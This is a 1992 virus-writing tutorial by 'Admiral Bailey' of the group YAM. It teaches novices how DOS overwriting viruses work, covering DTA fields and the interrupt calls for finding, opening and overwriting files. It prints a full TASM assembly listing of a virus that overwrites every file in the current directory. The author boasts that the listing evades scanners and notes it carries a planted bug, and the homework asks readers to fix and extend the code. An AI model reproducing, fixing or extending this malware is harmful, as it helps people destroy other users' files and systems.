___ ___ __________ _____________ / | | \ / __ \ / \ | | | | | / \ | | | | |_/ | | \__/ | | | | | | | | || || | \______ | | __ | | || || | \ | | || | | | \_/ | | ________| | | || | | | | | / | | || | | | | | |____________/ \___/ \___/ \__/ \__/ þ Youngsters Against McAfee þ Present An Intro to Virii and How to write Overwriting Virii Part I of an on going series of the Totally Whacked Out Virus Writer's Manual By Admiral Bailey [YAM] ______________ --| Disclaimer |------------------------------------------------------------ ~~~~~~~~~~~~~~ I am not responsible for any damage that is done by this text file or that some person was encouraged to create a virii because they read this manual. I have written this for study purposes only. Like John McAfee writing virii for his study purposes. ___________________ --| Copyright Stuff |-(C)opyrite 1992--------------------------------------- ~~~~~~~~~~~~~~~~~~~ I am giving this thing out to only those that are privileged enough to get the Password from a YAM member. By asking and getting the password you agree that you will not give the password to anybody else and you will keep it a secret. This text file is Copywriter by me. If you tamper with it in any way and distribute it as your own I will not be able to do anything legal about it. But i can do something just as bad. So don't even think about it. Now onto the good stuff... ________________ --| Introduction |---------------------------------------------------------- ~~~~~~~~~~~~~~~~ As you already know this is part one of an ongoing series of different things to do with virii. The current file (Overwriting virii) is just the first file of the total collection. The first few pages will be very boring because this manual is aimed at the novice group of virii programmers. Basically that's why I started with over writers. We all need to start somewhere. Now for this manual and every following manual you will need the following: þ A Knowledge of assembler. Not a lot but not too little. þ An Assembler. All code (if any) given will be fully compatible with TASM 2.0. I also recommend TASM 2.0 because its the best. Whatever else is up to you. __________________________ | Why Am I Writing This? | ~~~~~~~~~~~~~~~~~~~~~~~~~~ Why? Well because as I was learning this stuff I had no where to go for help. I asked other people but what they told me sounded like greek. There is no book you could buy with this and every other text file I have read didn't have a clear enough explanation on the topic. So here is a complete manual with loads of detail. Stuff that I wanted to know when I was starting out. It may not be the best way to do these things but its the way that I learned and use now. ___________________ | What are virii? | ~~~~~~~~~~~~~~~~~~~ Before anyone can create a virus they must first know what a virus is. Well in general terms a virus is a small (or some large) computer program that spread around computer systems by copying itself on the end of other programs so that the virus is run first instead and control is returned to the original (host) file. Some may think that this is not a problem. Well it actually is. Most virii either annoy the user (not allowing them to use their computer or slowing it down), do damage to the computer (format the hard drive, erase files, corrupt files ect.), or some may just spread taking up hard drive space as it infects every executable file. Most people get the terms virus and trojan mixed up. They think that they are both the same things when actually they aren't. A virus is just like i explained above as a trojan is a program that will do harmful damage to a computer as it is run. _______________________________________________ | What Type of Virus Are We Going to Discuss? | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In this manual we are going to start with one of the easiest less complicated type of virus know as the Overwriting Virus. Its basically called this because instead of it attaching onto the end of a file it will overwrite the beginning of the file with a copy of itself. Therefore when the host file is run only the virus will be executed and the host file will be destroyed. This type of virus has its good points and its bad points. Some of the good points are: þ its easy to make þ it does not change the file size of the host file þ it causes data corruption Some of the bad points are: þ it destroys the host file there making the user suspect a virus has hit him. (lack of stealth) þ its so primitive that every lame user will now they got hit when they receive a out of memory message or some shit like that. þ it wont last long on a system because users will have to keep replacing the corrupted files with new ones. So we could just use these type of virii as a stepping stone until we learn something better like com/exe infectors. _______________________ | What Will You Need? | ~~~~~~~~~~~~~~~~~~~~~~~ You don't need much to create your first virus. Everything you should be able to find on your local pirate board or if not get it off your local PD board. Whichever but just as long as you get the stuff To create your very first virus you will need all of the following: þ TASM (Latest Version). Its the best! þ Knowledge of assembly. Duh!? Whats Dat??? That's it at the basic's but if you want more here are some recommendations: þ Any source code that you can use to help you. (Take a look at the Seneca 1 virus.) þ A good debugger. A lot of people like turbo debugger but personally I like debug because its quick and simple. þ Ralph Browns Interrupt list. Its pretty big (1 meg). But it has almost every interrupt that you can call on a computer and its getting bigger. Even has some undocumented calls. þ Any virus mag. I personally like NUKE's because it has a lot of info in it. But Evolution is still on top. :) þ Sourcer so you can get a commented source of other virii that you have. þ And samples of other overwriting virii. That you can sourcer and learn from. Anything else as I said before is up to you. _____________________ --| Let's Get Writing |---------------------------------------------------------- ~~~~~~~~~~~~~~~~~~~~~ Before we start I just have to say that the virus that i will use as an example will be completely stripped. That means it will not restore the original dates/attributes or anything else. It will infect all the virii in the current directory. Il write more manuals on stuff like that. First i am going to show you a flow chart of what the basic outline of execution should be. From there we will work. ÚÄÄÄÄÄ¿ ³Start³ ÀÄÄÄÄÄÙ ³ ÚÄÄÄÄÄÄÄÄÄ¿ ÚÄijFind file³ ³ ÀÄÄÄÄÄÄÄÄÄÙ ³  ³ ÚÄÄÄÄÄÄÄÄÄ¿ Nope ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄ¿ ³ ³Any found³ÄÄÄÄÄÄÄÄÄÄijDisplay message³ÄÄÄÄÄijQuit!³ ³ ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÙ ³ ³ Yup ³ ÚÄÄÄÄÄÄÄ¿ ³ ³Open It³ ³ ÀÄÄÄÄÄÄÄÙ ³ ³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ³Copy Self On to³  ³ Beginning ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ³ Close File ³ ³ ³& find another³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÙ The flowchart is quite obvious. Just follow through it and you will get the idea of how this type of virus will work. Now lets get into some code. ________________________________ | Finding The First/Next File? | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This will be quit simple to explain. Its the part that finds the first file in the directory. There are two different types of procedure that is used to find files. The first one finds the first file. The second one find the next and on files using the info in the DTA (Data Transfer Area, will be explained later.). They are pretty self explanatory and are as follows: Find First: AX = 4Eh ; Find first command DX = Offset of filetype ; Holds the file type to look for ; ex. '*.exe',0 CX = attributes on files to look for. We will set this to zero using the xor command because we wont want to remove any attributes off of read only files. Find Next : AX = 4Fh ; that's all you need because then it ; gets the rest of the info from the dta After filling these you execute interrupt 21h as usual. ____________________ | What Is the DTA? | ~~~~~~~~~~~~~~~~~~~~ DTA (Short for Data Transfer Area) is an area in the coding that holds information for different reasons. For example if a program need command line parameters like: Scan C: ^------ Command line parameter It stores these parameters in the DTA so that the program can read these later. It also holds information about a file when using the find first/next commands. The DTA starts at offset 80h and when the find first/next command is called it fills the DTA as follows: Offset Size Info Held | | 15h | BYTE | attribute of file found 16h | WORD | file time | | bits 11-15: hour | | bits 5-10: minute | | bits 0-4: seconds/2 18h | WORD | file date | | bits 9-15: year-1980 | | bits 5-8: month | | bits 0-4: day 1Ah | DWORD | file size 1Eh | 13ByT | ASCIIZ filename+extension Since the DTA starts at 80h you must add 80h to the offset in order to get a value. For example to get the file date you use : Mov ax,[80h+18h] ; put the file date into ax _________________________ | The Infection Process | ~~~~~~~~~~~~~~~~~~~~~~~~~ Now that you have found your file you have to infect it. To do this you have to : þ Open the file þ Write virus over the beginning of file þ Close file As easy as that. To open the file you use the open file command. Open File : AH = 3DH ; open file command AL = 02h ; open for read/writing DX = holds location of asciiz filename from the DTA use the mothod explained under DTA Now after it is opened you do a : XCHG AX,BX What that does is exchange the values in the ax and bx registers. When the file is opened it puts the file handle (explained below) into bx. Why well whenever you execute an interrupt that works with a file handle it always wants the file handle in bx. So its easier to just put it in there now and get it over with. But make sure you always save this handle and never loose it or your file infection is screwed. So never replace bx while a file is open! Now after opening the file the file pointer is at the beginning of the file. The file pointer just points to the location in the file you will either write to or read from. All you have to do now is write to the file using the write to file command. Write To File : AH = 40h ; write to file command BX = has file handle ; already there DX = 100h ; location in our file to start writing from. Set at 100h because that's the start of all com files. CX = file size ; can be calculated by subtracting ; the top of the file from the end. ; this tells the number of bytes to ; write Now you close the file using the close file command. Close File : AH = 3Eh ; close file command BX = File handle After you close the file you jump to find another file. If you cant find another file then you can display a message and quit. (See an example below.) The reason we don't check for previous infections is because if it was previously infected then the virus will just write over itself. So there is no real need. That's all there is to the infection process. ________________ | File Handles | ~~~~~~~~~~~~~~~~ File handles are just a temporary number that is given to every file when they are opened. Its easier working with a file handle then using the file name every time. You must NEVER erase your file handle in your program while a file is open or else it the program will crash because it doesn't know what file to work with. So always save by pushing it on the stack with a push bx whenever you need to use the bx register. __________________ | Error Checking | ~~~~~~~~~~~~~~~~~~ I haven't touched too much on error checking for one reason. It won't take long. Basically when you execute a command when opening the file ect... you can check if an error occurred by do a JC Quit command. When an error occurs a carry flag is set. So the JC command means jump if carry. So if an error occurs jump and you can close the file and find another. Easy. ______________ --| An Example |------------------------------------------------------------ ~~~~~~~~~~~~~~ Below is just an example of an overwriting virus. As of scan 97 it is unscannable. It may not be fully functional. (I don't just want people compiling it and calling it there's so i put in an error.) HINT: The error may be with opening the file for the first time. ; ; Written by Admiral Bailey ; YAM - Youngsters Against Mcafee ; code segment assume ds:code, ss:code, cs:code, es:code org 100h ;Make it a .com file seneca: ; marker for the beginning of virus mov dx,offset file_type ;Load the type of file to look for mov ah,4eh ;Find first file command xor cx,cx ;Clear cx find only normal files int 21h jc quit ;if none found quit jmp infect ;if found then infect find_next_file: mov ah,4fh ;find next file command int 21h ;do it cmp ax,12h ;any more files? je quit ;nope then quit jmp infect ;yup then infect quit: mov ah,9 ; display message command mov dx,offset message ; location of the message int 21h int 20h ; halt program infect: mov ax,3d02h ; open file read/write mov dx,80h+1eh ; file name location in DTA int 21h ; do it jc findnextfile ; if error find another file ; why not close first? Well the file ; never got opened to begin with xchg bx,ax ; put the handle into bx mov cx,virus_end-seneca ; put size of virus in cx mov dx,100h ; where to start writing from mov ah,40h ; write to file command int 21h closefile: mov ah,3eh ; close the file int 21h jmp find_next_file ;now find another file message db 'Hey Look Its An Overwriting Virus',13,10 db 'WOW!!!!',13,10 db 'And BTW this file is screwed',13,10,'$' file_type db '*.*',0 ; get every file virus_end equ $ ; marker for the end of the virus code ends end seneca _____________ --| Home Work |------------------------------------------------------------- ~~~~~~~~~~~~~ If you want something to do then take the above virus fix the error and then build it up. Do stuff like make it save attributes, time/date stamp whatever. If you can't then I may be releasing a file on doing things like that. ______________ --| Conclusion |------------------------------------------------------------ ~~~~~~~~~~~~~~ In conclusion I would just like to say if this manual helped you any then let me know. It will encourage me to write more. Future topics that I am going to release are: þ COM Infection þ Extras You Can Add on to virii þ Encryption using the xor method (This ones almost done) þ EXE Infection þ Different Ways Of Killing The Computer þ Debug Killing techniques And more as I learn. Before I go I wanna send out some greats : NUKE : Love the Info journals (and virii) Dark Angel : Hope this gets up there with your phunky virus writing guide. Phalcon/Skism : What is there to say but Whats up?! John McAfee : Just helping out your job a bit. :) Remember me when the money starts rolling' in. Admiral Bailey [YAM]